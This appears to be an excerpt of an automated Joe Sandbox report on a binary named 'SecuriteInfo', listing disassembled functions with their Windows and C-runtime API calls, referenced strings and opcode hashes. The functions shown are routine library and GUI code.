Instruction Fuzzy Hash: 7C012B6B5083925BC310AB386C459EFBB999AD1311F484DBFEDD582203E65D950D83A2

Function 00493544 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0049356A

Part of subcall function 00493396: __fltout2.LIBCMT ref: 004933C1

__cftog_l.LIBCMT ref: 00493590
__cftoe_l.LIBCMT ref: 004935C2

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 80f96edd2cb545f02037a37a4667827b6aa8b152e4450e577fb13565e69e014b
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 3911807200014AFBCF125E95CC05CEE3F72BB0D369F598426FA1859131D33ACAB1AB85

Function 0045D843 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0045D879
GetWindowLongA.USER32(00000000,000000F0), ref: 0045D889
SendMessageA.USER32(?,00001330,-00000001,00000000), ref: 0045D8A2
SendMessageA.USER32(?,0000130B,00000000,00000000), ref: 0045D8B1

Part of subcall function 00468FF0: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 00469007

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: d11e220fb32a21dd5a3ff02042e385134121e75356858567163c30d15e8e0d51
Instruction ID: afb449800ab7bdedf4517f10eec5218590a263b2dff8b4735706eb92a5bf88f9
Opcode Fuzzy Hash: d11e220fb32a21dd5a3ff02042e385134121e75356858567163c30d15e8e0d51
Instruction Fuzzy Hash: 6D01A435A443047BE731AB248C81FAB73647F88B01F24491EFE25AA2C6C6B8E904875C

Function 004C793A Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,004C79B3,00000000,004CF66F,004DAAC0,00000000,00000314,?,004CD4E1,004DAAC0,Microsoft Visual C++ Runtime Library,00012010), ref: 004C794C
TlsGetValue.KERNEL32(00000005,?,004C79B3,00000000,004CF66F,004DAAC0,00000000,00000314,?,004CD4E1,004DAAC0,Microsoft Visual C++ Runtime Library,00012010), ref: 004C7963

Strings

KERNEL32.DLL, xrefs: 004C7973, 004C7978, 004C7983
EncodePointer, xrefs: 004C798E

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Value
String ID: EncodePointer$KERNEL32.DLL
API String ID: 3702945584-3682587211
Opcode ID: 933edaf373223f410994d8deba077d4840660b70a21015c233feb9cf8ee0face
Instruction ID: b7002ef8fc7258298fa2a3332dffa766a62ef372f10b0af25702c0c09fae2954
Opcode Fuzzy Hash: 933edaf373223f410994d8deba077d4840660b70a21015c233feb9cf8ee0face
Instruction Fuzzy Hash: 2BF0A4745095166BAB506B39DC04F9B3F999F003F0714413BF808D7261EB7CCD518AAC

Function 0048BD19 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0048BD25

Part of subcall function 0048BF42: __amsg_exit.LIBCMT ref: 0048BF52

__getptd.LIBCMT ref: 0048BD3C
__amsg_exit.LIBCMT ref: 0048BD4A
__updatetlocinfoEx_nolock.LIBCMT ref: 0048BD6E

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: d8f8675a2bda6194cbcf093450a57bcb5c1c1f4bdb65ef2b2238b62545dee283
Instruction ID: a115c13b63cd1dd4c48937463ce9d4a8838c43b2c564dc4c9c53dd0b20d3f95b
Opcode Fuzzy Hash: d8f8675a2bda6194cbcf093450a57bcb5c1c1f4bdb65ef2b2238b62545dee283
Instruction Fuzzy Hash: 11F06D32941610AEDB21BB699802B4E37E0AF41728F118A5FF154AA2E2CB6C59419B9D

Function 00448260 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON

Download Yara Rule

Strings

Compile error %d at offset %d: %hs, xrefs: 004484D7
0, xrefs: 004484EF

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __mbscmp_l
String ID: 0$Compile error %d at offset %d: %hs
API String ID: 3859253798-2351679343
Opcode ID: 42b227cf25a74392adbe79701c722fa4432c51f4a1b4835e11465bd26dda8a56
Instruction ID: 6f8dfd2ee42d6d32a0c0c763ccf8a6ca41862e9b3820e70b5bd9388c26d8686c
Opcode Fuzzy Hash: 42b227cf25a74392adbe79701c722fa4432c51f4a1b4835e11465bd26dda8a56
Instruction Fuzzy Hash: 9AB1BF71504342DFE710CF64D880B6F7BE0FB86704F24496EE89687281DB79E945CB9A

Function 0040C500 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON

Download Yara Rule

Strings

"%s" is not a valid key name., xrefs: 0040C73D
"%s" is not allowed as a prefix key., xrefs: 0040C5E9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _vswprintf_s
String ID: "%s" is not a valid key name.$"%s" is not allowed as a prefix key.
API String ID: 677850445-1430096861
Opcode ID: 3e07e850b92cdf0c6085769cc4a28c7ff03922e702eeae7a7e802cd4d62b9cc2
Instruction ID: 4f382805f19da2180d5caead43a862648d3eb5bddbfc99d772f1c4535980d1fc
Opcode Fuzzy Hash: 3e07e850b92cdf0c6085769cc4a28c7ff03922e702eeae7a7e802cd4d62b9cc2
Instruction Fuzzy Hash: 9B714E366883859AD730DB18ACC17EB7B518B92320F48063FE884573D1D77D994D879E

Function 0042E0A0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0042E142
_strncpy.LIBCMT ref: 0042E164

Strings

Out of memory., xrefs: 0042E0F8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: Out of memory.
API String ID: 2961919466-4087320997
Opcode ID: 222a947d1583a66cba2129528862bf92843d5266c937ce8096d9f58ee0efe299
Instruction ID: f3350d9e4b669503293bb1423a86bdc65fa9769d78005760cd33acd2171417c7
Opcode Fuzzy Hash: 222a947d1583a66cba2129528862bf92843d5266c937ce8096d9f58ee0efe299
Instruction Fuzzy Hash: 09813771F001699BDF21CF56E8407FEBBA49F45300F5844EAD8459B342D2399D46CBEA

Function 0041B910 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

Out of memory., xrefs: 0041B9B5

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Out of memory.
API String ID: 0-4087320997
Opcode ID: 5df68665805fa0121b89b2b2589b58cddb4293171a95d980e110860cd353fce0
Instruction ID: 5fb384675a0dc50f90e14b920e033add67d1511a4889e70c7495010079097858
Opcode Fuzzy Hash: 5df68665805fa0121b89b2b2589b58cddb4293171a95d980e110860cd353fce0
Instruction Fuzzy Hash: CC8102B1A087849FEB359F2488457E77BD0EF05350F0849ABE58546B92E36CA8C5C7CA

Function 004395E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00000000,?), ref: 004396F5

Strings

Fast, xrefs: 004395F9
RGB, xrefs: 00439616

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: RectWindow
String ID: Fast$RGB
API String ID: 861336768-1098338811
Opcode ID: 5c0a9340234e0601591af33763e0d034e51b51a9c9d23a8a2999f963c338e515
Instruction ID: e6814676a5e5825ca47ec5e70d66f62db54848c0df4690f7c2f4d04766265084
Opcode Fuzzy Hash: 5c0a9340234e0601591af33763e0d034e51b51a9c9d23a8a2999f963c338e515
Instruction Fuzzy Hash: B551E3719083518BDB15CF2988806AFBBE1AFD9704F18492EF8C597381D7B8CD05CB9A

Function 00452DF4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00452E1D

Strings

Select Folder - %s, xrefs: 00452F65

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: Select Folder - %s
API String ID: 2961919466-105526948
Opcode ID: ff035f4efb90692c4aee8432714624a7e174e29da565a2c166926be2b8efcdbe
Instruction ID: 3a88df93b206d4dd24f526dcb0b695f9380f3dcd0ee6e4424733dbdb523ff2f3
Opcode Fuzzy Hash: ff035f4efb90692c4aee8432714624a7e174e29da565a2c166926be2b8efcdbe
Instruction Fuzzy Hash: 9B412A726083805FD320DB20D9427ABBBE16BC6305F48492FEA8587343E7BD8549C75B

Function 00444AD8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00444AEC
_strncpy.LIBCMT ref: 00444C52

Strings

Unknown, xrefs: 00444AE6

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: Unknown
API String ID: 2961919466-1654365787
Opcode ID: 1cf64190748598c52672a965eb29f83a6458ff226bccbce5984e980c6601734c
Instruction ID: 49e55c3a7feedeefeeaec6d80aefa32d128ecc042c8c5a01ff30d090eb83e333
Opcode Fuzzy Hash: 1cf64190748598c52672a965eb29f83a6458ff226bccbce5984e980c6601734c
Instruction Fuzzy Hash: 8C41B670E89305AAF7615BB4AC5ABA73F50D742B10F544537E14C8F2D1EABA9008CBCD

Function 0044AEF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 0044AFF9

Strings

%0.*f, xrefs: 0044AFF3

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _sprintf
String ID: %0.*f
API String ID: 1467051239-3326200935
Opcode ID: 18667c09ef991628dbc6524f5a5825c8ab574a764e05b72a9486b9ac1f38b440
Instruction ID: dbc89e44c8a00511ea378cceaa9b516ed2166d25e730698647ce9aded81fd372
Opcode Fuzzy Hash: 18667c09ef991628dbc6524f5a5825c8ab574a764e05b72a9486b9ac1f38b440
Instruction Fuzzy Hash: 284127B1A04601DBD300BF59E90565AB7B0FF89315F1045AFF98993251EB358939878B

Function 004169C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416BF0

Part of subcall function 00417A00: _strncpy.LIBCMT ref: 00417A53

Strings

No tray mem, xrefs: 00416C17
Tray, xrefs: 00416BFD

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset_strncpy
String ID: No tray mem$Tray
API String ID: 3140232205-3325046031
Opcode ID: 1c68ddd747a29ff66e6272a5fea186583d12fed8a3bc3c8ce4960ecbf164bb85
Instruction ID: 5b41eac3766e6f846769293830b4ca942869d9212734fe47dd4e7d8e0dc2b9fa
Opcode Fuzzy Hash: 1c68ddd747a29ff66e6272a5fea186583d12fed8a3bc3c8ce4960ecbf164bb85
Instruction Fuzzy Hash: E55144BA8563419EC710EF9AAD81681BEE4F71BB04BD4827F9058C7661D37A004DCF9D

Function 0043F9B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 0043F9DA

Part of subcall function 00489975: strtoxl.LIBCMT ref: 00489996

__wcstoi64.LIBCMT ref: 0043FA12

Strings

Can't Open Specified Mixer, xrefs: 0043FAA2, 0043FABD

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64$strtoxl
String ID: Can't Open Specified Mixer
API String ID: 3288754983-183344801
Opcode ID: 2572b8bcc7dab9469193180292703fdc1eb227af6629c83ba1ff62ae1481b1a9
Instruction ID: 46c657d7dc33054d47c6c2002480d19f65d3ff7081e544730719f903f2da4c56
Opcode Fuzzy Hash: 2572b8bcc7dab9469193180292703fdc1eb227af6629c83ba1ff62ae1481b1a9
Instruction Fuzzy Hash: E6315972E0430076D610BF40DC42FAB7BA4AB8E754F200A6BF948662C1E7699959879F

Function 0043EF60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0043EF97

Strings

\, xrefs: 0043EFCB
\, xrefs: 0043EFB9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: \$\
API String ID: 2961919466-164819647
Opcode ID: b05b3d95a89f5a38efaae675fe4267d40ddd970427709de8bd6cbb3ae372ee4f
Instruction ID: b0a127dc0ac368408a8c41460560065476190c3647dcd1dda1f9916cd1adaff0
Opcode Fuzzy Hash: b05b3d95a89f5a38efaae675fe4267d40ddd970427709de8bd6cbb3ae372ee4f
Instruction Fuzzy Hash: 2A3146325083006AD310DA28DC41FEBBB989BC9728F14467FF994572C2C7B9A948C7DA

Function 0040C0E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0040C0FB

Part of subcall function 0040C200: _memset.LIBCMT ref: 0040C214

Strings

~, xrefs: 0040C154
& , xrefs: 0040C106

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset_strncpy
String ID: & $~
API String ID: 3140232205-4238529414
Opcode ID: da4c6339cfa411e82d491ae5ab264583969caee78eb50761345d6a3684f6c294
Instruction ID: 90a51e2364eb26f4edb8a0c32b6f2e20a1e3d7b97670c69ff8e308a45420968f
Opcode Fuzzy Hash: da4c6339cfa411e82d491ae5ab264583969caee78eb50761345d6a3684f6c294
